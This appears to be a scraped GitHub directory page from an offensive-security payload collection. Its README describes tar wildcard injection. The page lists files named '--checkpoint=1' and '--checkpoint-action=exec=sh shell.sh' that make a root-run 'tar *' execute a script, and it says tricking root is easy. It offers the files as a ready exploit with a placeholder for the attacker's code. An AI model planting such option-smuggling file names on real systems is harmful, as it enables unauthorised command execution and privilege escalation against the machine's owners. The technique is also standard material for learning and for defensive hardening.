Name	Name	Last commit message	Last commit date
parent directory ..
--checkpoint-action=exec=sh shell.sh	--checkpoint-action=exec=sh shell.sh
--checkpoint=1	--checkpoint=1
README.md	README.md
shell.sh	shell.sh

Name

Last commit message

Last commit date

TAR Command Execution

By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.

Exploit

These files work against a "tar *"

--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh   (your exploit code is here)

Thanks to

Exploiting wildcards on Linux - Berislav Kucan
Code Execution With Tar Command - p4pentest
Back To The Future: Unix Wildcards Gone Wild - Leon Juranic

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Tar commands execution

Tar commands execution

README.md

TAR Command Execution

Exploit

Thanks to

Files

Tar commands execution

Directory actions

More options

Directory actions

More options

Latest commit

History

Tar commands execution

Folders and files

parent directory

README.md

TAR Command Execution

Exploit

Thanks to